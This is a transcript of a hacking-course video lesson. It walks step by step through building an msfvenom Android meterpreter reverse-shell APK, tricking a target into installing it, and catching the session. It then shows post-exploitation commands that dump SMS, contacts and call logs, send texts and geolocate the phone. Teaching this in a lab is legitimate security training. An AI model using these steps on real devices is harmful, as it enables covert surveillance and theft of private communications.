1 00:00:00,540 --> 00:00:01,650 Instructor: Welcome back. 2 00:00:01,650 --> 00:00:03,990 Let's hack our Android device with the help 3 00:00:03,990 --> 00:00:07,323 of the Android payload that we'll craft with MSFVenom. 4 00:00:08,220 --> 00:00:10,560 So this is going to be our first attack. 5 00:00:10,560 --> 00:00:14,250 We're already familiar with both MSF Console and MSFVenom, 6 00:00:14,250 --> 00:00:16,980 so we can go straight into hacking the target. 7 00:00:16,980 --> 00:00:20,370 Now, if you might be asking why am I using ZSH right here? 8 00:00:20,370 --> 00:00:23,250 Well, I just decided to switch the terminal a little bit 9 00:00:23,250 --> 00:00:26,130 and I'm going to go and use ZSH 10 00:00:26,130 --> 00:00:29,340 throughout this section most of the time actually. 11 00:00:29,340 --> 00:00:33,000 But nonetheless, you can use the regular terminal like this. 12 00:00:33,000 --> 00:00:35,790 Whatever you feel like it is exactly the same. 13 00:00:35,790 --> 00:00:37,860 It just looks a little bit different. 14 00:00:37,860 --> 00:00:40,410 But nonetheless, what is important for this attack is 15 00:00:40,410 --> 00:00:42,540 that you have your Kal Linux machine opened 16 00:00:42,540 --> 00:00:46,560 and you have your Android machine open right here. 17 00:00:46,560 --> 00:00:49,410 So once you get both of these things open 18 00:00:49,410 --> 00:00:52,080 the first thing that we want to do is, as usual 19 00:00:52,080 --> 00:00:54,180 we want to check out the IP address 20 00:00:54,180 --> 00:00:55,993 of our Kal Linux machine. 21 00:00:55,993 --> 00:00:57,300 We need the IP address 22 00:00:57,300 --> 00:00:59,640 in order to craft the payload. 23 00:00:59,640 --> 00:01:00,690 Once we check it out, 24 00:01:00,690 --> 00:01:04,290 in my case, it is 192.1.68.1.9. 25 00:01:04,290 --> 00:01:06,150 We want to generate the MSFVenom 26 00:01:06,150 --> 00:01:08,700 on payload for the Android device, 27 00:01:08,700 --> 00:01:10,980 but this is something that we haven't done before. 28 00:01:10,980 --> 00:01:14,130 We used meterpreter, we used the Windows Reverse TCP 29 00:01:14,130 --> 00:01:16,083 and all of those different payloads, 30 00:01:17,209 --> 00:01:20,580 but we never really saw how an Android payload looks like. 31 00:01:20,580 --> 00:01:23,610 Well, this is the first time and in order to craft it 32 00:01:23,610 --> 00:01:26,340 let us first navigate to the desktop 33 00:01:26,340 --> 00:01:30,660 and let's run the command, MSFVenom dash P 34 00:01:30,660 --> 00:01:32,010 and then the name of the payload, 35 00:01:32,010 --> 00:01:35,070 which is android slash metepreter 36 00:01:35,070 --> 00:01:39,330 slash reverse underscore TCP. 37 00:01:39,330 --> 00:01:41,580 And you will already notice 38 00:01:41,580 --> 00:01:43,170 that this is a meterpreter payload 39 00:01:43,170 --> 00:01:45,124 So we're going to get all 40 00:01:45,124 --> 00:01:45,960 of those cool options that we can use 41 00:01:45,960 --> 00:01:48,240 in the post exploitation with this 42 00:01:48,240 --> 00:01:50,490 meterpreter Android payload. 43 00:01:50,490 --> 00:01:54,000 Once we set the payload, we need to set the L host, and 44 00:01:54,000 --> 00:01:57,600 in my case, that is 192.168.1.9 45 00:01:57,600 --> 00:01:59,430 and the L port can be anything. 46 00:01:59,430 --> 00:02:01,473 So I'm just going to go with 5555. 47 00:02:02,792 --> 00:02:07,140 Once I set this, I want to output it as the file 48 00:02:07,140 --> 00:02:09,030 that can run on Android. 49 00:02:09,030 --> 00:02:11,670 Android has dot apk files. 50 00:02:11,670 --> 00:02:14,250 Those are applications that can run on Android device, 51 00:02:14,250 --> 00:02:15,570 so we must make sure that 52 00:02:15,570 --> 00:02:19,650 our payload has the extension of apk. 53 00:02:19,650 --> 00:02:24,650 We can call it, for example, Shell and then dot apk. 54 00:02:25,800 --> 00:02:26,670 This is a must. 55 00:02:26,670 --> 00:02:31,670 If you type something like dot exc or dot PY, it won't work. 56 00:02:31,950 --> 00:02:35,310 So make sure you add dot apk and once you craft 57 00:02:35,310 --> 00:02:38,040 the entire command, press enter. 58 00:02:38,040 --> 00:02:40,980 And while this payload is being created, let's go 59 00:02:40,980 --> 00:02:42,273 to the second terminal. 60 00:02:43,110 --> 00:02:48,110 I will enter the ZSH and I will go and start the Apache2 61 00:02:48,870 --> 00:02:52,440 web server, just so we can actually transfer the payload 62 00:02:52,440 --> 00:02:56,010 from our Kal Linux machine to the Android device. 63 00:02:56,010 --> 00:02:58,830 I'm going to enter my password right here, and 64 00:02:58,830 --> 00:03:00,750 once the Apache tool has been started, 65 00:03:00,750 --> 00:03:02,520 we can go back to the first terminal. 66 00:03:02,520 --> 00:03:04,440 We can see the payload has been created. 67 00:03:04,440 --> 00:03:07,290 If I type LS, we will have it right here, 68 00:03:07,290 --> 00:03:09,180 which is shell dot apk. 69 00:03:09,180 --> 00:03:12,086 And what I'm going to do right now is I'm going to 70 00:03:12,086 --> 00:03:14,380 move that shell dot apk to do slash var slash 71 00:03:15,665 --> 00:03:18,310 www slash html directory in our Kal Linux machine 72 00:03:19,366 --> 00:03:21,510 because that directory is the web server directory. 73 00:03:21,510 --> 00:03:23,190 Hmm, permission denied. 74 00:03:23,190 --> 00:03:25,980 That is because this directory requires root privileges, 75 00:03:25,980 --> 00:03:27,990 so let's just type pseudo 76 00:03:27,990 --> 00:03:31,290 and then move it to that directory. 77 00:03:31,290 --> 00:03:34,920 If I go there, type LS 78 00:03:34,920 --> 00:03:37,890 we're going to have our Shell dot apk there. 79 00:03:37,890 --> 00:03:39,270 Now that we have that ready, 80 00:03:39,270 --> 00:03:43,020 let's go and start MSF console. 81 00:03:43,020 --> 00:03:44,220 While it is starting, 82 00:03:44,220 --> 00:03:46,920 we're going to go to our Android device 83 00:03:46,920 --> 00:03:49,800 and here is where it gets tricky a little bit. 84 00:03:49,800 --> 00:03:51,660 As I mentioned in the theory video, 85 00:03:51,660 --> 00:03:54,180 there are a lot of things that the target has to do 86 00:03:54,180 --> 00:03:57,270 in order for this payload to be executed. 87 00:03:57,270 --> 00:03:59,220 The first thing that they have to do, is they 88 00:03:59,220 --> 00:04:03,960 actually have to visit your link where your payload is. 89 00:04:03,960 --> 00:04:06,570 In our case, or in my case, it is 90 00:04:06,570 --> 00:04:10,773 under the IP address of 192.168.1.9. 91 00:04:12,210 --> 00:04:14,280 So I'm going to visit that payload 92 00:04:14,280 --> 00:04:17,850 and we're going to see this shell dot apk right here. 93 00:04:17,850 --> 00:04:19,142 If they click on that, 94 00:04:21,390 --> 00:04:22,530 the download will finish 95 00:04:22,530 --> 00:04:25,380 and then they have to click on open. 96 00:04:25,380 --> 00:04:28,950 Now this can only be achieved if your target, for example 97 00:04:28,950 --> 00:04:31,380 thinks that the payload is something, 98 00:04:31,380 --> 00:04:33,090 or something that they want to download. 99 00:04:33,090 --> 00:04:35,550 In other words, if they suspect 100 00:04:35,550 --> 00:04:38,040 of the payload being anything else but thing 101 00:04:38,040 --> 00:04:39,390 that they want to download, 102 00:04:40,374 --> 00:04:41,251 this will most likely fail 103 00:04:41,251 --> 00:04:43,830 and they will never download your application and run it, 104 00:04:43,830 --> 00:04:46,680 especially once they reach this part right here. 105 00:04:46,680 --> 00:04:48,875 If they actually read what this application 106 00:04:48,875 --> 00:04:50,550 will be able to do 107 00:04:50,550 --> 00:04:53,220 it tells us that it'll get access 108 00:04:53,220 --> 00:04:55,020 to modifying system settings, 109 00:04:55,020 --> 00:04:58,770 take pictures and videos, modify your contacts 110 00:04:58,770 --> 00:05:03,630 record audio, directly call phone numbers, read call logs 111 00:05:03,630 --> 00:05:07,590 read phone status and identity and write call logs. 112 00:05:07,590 --> 00:05:09,390 And this is not the only thing. 113 00:05:09,390 --> 00:05:12,270 If we click on next, it gives us even more things 114 00:05:12,270 --> 00:05:14,670 that this application will be able to do, 115 00:05:14,670 --> 00:05:18,360 which is read your text messages, receive text messages 116 00:05:18,360 --> 00:05:21,690 modify or delete contents of your SD card 117 00:05:21,690 --> 00:05:24,510 and none applications should be able to do all 118 00:05:24,510 --> 00:05:25,800 of these things. 119 00:05:25,800 --> 00:05:28,620 However, most of them will not read through this. 120 00:05:28,620 --> 00:05:30,243 They will just click on install. 121 00:05:31,740 --> 00:05:33,930 The application will take a few seconds to install 122 00:05:33,930 --> 00:05:36,510 and it'll tell you that this app was built 123 00:05:36,510 --> 00:05:39,180 for an older version of Android and doesn't include 124 00:05:39,180 --> 00:05:41,520 the latest privacy protections. 125 00:05:41,520 --> 00:05:43,353 If they click on install anyway, 126 00:05:44,520 --> 00:05:46,740 the app will fully be installed. 127 00:05:46,740 --> 00:05:49,380 They might get this warning right here. 128 00:05:49,380 --> 00:05:50,970 It depends of the Android version. 129 00:05:50,970 --> 00:05:53,910 It says Play Protect hasn't seen this app before 130 00:05:53,910 --> 00:05:58,080 to protect yourself and others send it for a security scan. 131 00:05:58,080 --> 00:05:59,970 They will most likely, if they came up to this point 132 00:05:59,970 --> 00:06:02,220 they will not send anything for the scan 133 00:06:02,220 --> 00:06:05,160 and they will just run the application. 134 00:06:05,160 --> 00:06:06,600 But before we actually run it 135 00:06:06,600 --> 00:06:10,350 we need to set up a listener inside of our MSF console. 136 00:06:10,350 --> 00:06:13,680 So let's go and type use expert multi-handler 137 00:06:13,680 --> 00:06:14,970 and let's set the payload 138 00:06:14,970 --> 00:06:19,970 to be Android interpreter reverse TCP. 139 00:06:21,840 --> 00:06:25,740 We need to set the L host to be 192.168.1.9 140 00:06:25,740 --> 00:06:29,250 and set LPORT to be 5555. 141 00:06:29,250 --> 00:06:30,630 Once we do all of that 142 00:06:30,630 --> 00:06:32,370 we can press run 143 00:06:32,370 --> 00:06:35,096 and while our listener is being executed 144 00:06:35,096 --> 00:06:37,083 they can run the application, 145 00:06:38,190 --> 00:06:42,150 which on their screen, nothing will actually happen. 146 00:06:42,150 --> 00:06:44,763 But if we go back to our Kal Linux machine, 147 00:06:46,116 --> 00:06:48,270 we have the interpreter session one open 148 00:06:48,270 --> 00:06:50,220 and if I type get user ID, 149 00:06:50,220 --> 00:06:53,490 I will see what is the user ID of the target. 150 00:06:53,490 --> 00:06:55,298 If I type help, 151 00:06:55,298 --> 00:06:56,940 I will see all the available commands that I can run 152 00:06:56,940 --> 00:06:59,130 on the target entry device 153 00:06:59,130 --> 00:07:01,530 and we can say it's not really the same 154 00:07:01,530 --> 00:07:03,780 as for the Windows meterpreter shell. 155 00:07:03,780 --> 00:07:06,750 We have a few new things such as screen share. 156 00:07:06,750 --> 00:07:09,270 We have two fully new sections 157 00:07:09,270 --> 00:07:12,060 of the commands, such as Android commands right here. 158 00:07:12,060 --> 00:07:14,520 Here we can use activity start, check route, 159 00:07:14,520 --> 00:07:19,290 dump call log, dump contacts, dump SMS, geo locate, 160 00:07:19,290 --> 00:07:21,840 hide app icon, and many other things. 161 00:07:21,840 --> 00:07:23,760 We can even send SMS. 162 00:07:23,760 --> 00:07:26,383 However, if you try any of these commands 163 00:07:26,383 --> 00:07:28,830 in an actual virtual machine, 164 00:07:28,830 --> 00:07:30,000 of course they will not work 165 00:07:30,000 --> 00:07:33,240 because we cannot send an SMS from a virtual machine. 166 00:07:33,240 --> 00:07:36,690 But if you were to hack an actual Android device, 167 00:07:36,690 --> 00:07:40,410 you can type send SMS, then dash D 168 00:07:40,410 --> 00:07:41,550 and as it says right here 169 00:07:41,550 --> 00:07:44,550 dash D specifies the destination address. 170 00:07:44,550 --> 00:07:47,160 In our case, that should be a phone number, so 171 00:07:47,160 --> 00:07:49,530 you specify the phone number that you want to send this to. 172 00:07:49,530 --> 00:07:51,480 It can be anything, 173 00:07:51,480 --> 00:07:54,960 and dash D is the actual text 174 00:07:54,960 --> 00:07:56,520 that you want to send. 175 00:07:56,520 --> 00:07:58,650 It must be a text between the double quotes, 176 00:07:58,650 --> 00:08:01,680 and you can type anything such as, "Hello World." 177 00:08:01,680 --> 00:08:05,310 Of course this won't work because our target is 178 00:08:05,310 --> 00:08:07,830 an actual virtual machine, but if you were to once 179 00:08:07,830 --> 00:08:10,230 again hack an actual Android device 180 00:08:10,230 --> 00:08:13,470 this will send text message to this phone number 181 00:08:13,470 --> 00:08:16,286 with this, "Hello world" message. 182 00:08:16,286 --> 00:08:17,970 Cool, right? 183 00:08:17,970 --> 00:08:20,250 And that is just one of the commands that you can do. 184 00:08:20,250 --> 00:08:22,410 You can dump all of the SMS messages 185 00:08:22,410 --> 00:08:24,600 if you type dump underscore SMS. 186 00:08:24,600 --> 00:08:26,700 This will print out all of the messages 187 00:08:26,700 --> 00:08:28,830 that that target has stored, 188 00:08:28,830 --> 00:08:32,610 so you can see what the target has talked with other people. 189 00:08:32,610 --> 00:08:35,990 You can even go and try to dump contacts in order to get all 190 00:08:35,990 --> 00:08:37,799 of the contacts from their phone. 191 00:08:37,799 --> 00:08:40,559 You can dump call logs to see all the people 192 00:08:40,559 --> 00:08:43,530 that they actually had a voice call with. 193 00:08:43,530 --> 00:08:44,580 There are other cool options 194 00:08:44,580 --> 00:08:46,590 as well, such as WLAN, geo locate, 195 00:08:46,590 --> 00:08:51,090 and it says, Get current lat-log using WLAN information 196 00:08:51,090 --> 00:08:54,630 and this lat-log is simply just latitude and longitude. 197 00:08:54,630 --> 00:08:56,400 In the application controller commands 198 00:08:56,400 --> 00:08:59,520 what you can do is you can install different applications. 199 00:08:59,520 --> 00:09:00,870 You can list applications. 200 00:09:00,870 --> 00:09:03,450 If I type app underscore list 201 00:09:03,450 --> 00:09:07,341 for some reason this time it'll time out, but nonetheless 202 00:09:07,341 --> 00:09:10,290 that could be because this send SMS message. 203 00:09:10,290 --> 00:09:11,880 We're going to check out this app list 204 00:09:11,880 --> 00:09:14,490 in the next video once we try out different attack. 205 00:09:14,490 --> 00:09:16,110 But one more thing I want to show you 206 00:09:16,110 --> 00:09:18,480 before I close off this video is 207 00:09:18,480 --> 00:09:22,680 that actual place where your application got installed. 208 00:09:22,680 --> 00:09:25,413 If I just close this Google Chrome first, 209 00:09:26,460 --> 00:09:29,160 is if you go to the applications, 210 00:09:29,160 --> 00:09:33,750 which you can go to by clicking on this arrow right here, 211 00:09:33,750 --> 00:09:36,180 you will have this main activity 212 00:09:36,180 --> 00:09:39,450 with the Android logo, and this is our payload. 213 00:09:39,450 --> 00:09:42,180 This is the virus that we sent to the target. 214 00:09:42,180 --> 00:09:45,240 In order to uninstall it, you can simply just hold 215 00:09:45,240 --> 00:09:49,350 onto it a little bit and then drag it to the uninstall 216 00:09:49,350 --> 00:09:53,010 and this will uninstall the payload from the Android device. 217 00:09:53,010 --> 00:09:54,180 Just in case you're testing 218 00:09:54,180 --> 00:09:56,280 on a real Android device and you want to make sure 219 00:09:56,280 --> 00:09:59,700 that you delete it afterwards, you can do that. 220 00:09:59,700 --> 00:10:01,440 Nonetheless, this is our first attack 221 00:10:01,440 --> 00:10:02,910 on an Android device and 222 00:10:02,910 --> 00:10:05,220 in the next video we're going to check out a similar attack 223 00:10:05,220 --> 00:10:09,330 with the Android payload just by using a different tool. 224 00:10:09,330 --> 00:10:11,010 And then we're also going to test 225 00:10:11,010 --> 00:10:13,620 out the Android application commands. 226 00:10:13,620 --> 00:10:14,920 See you in the next video.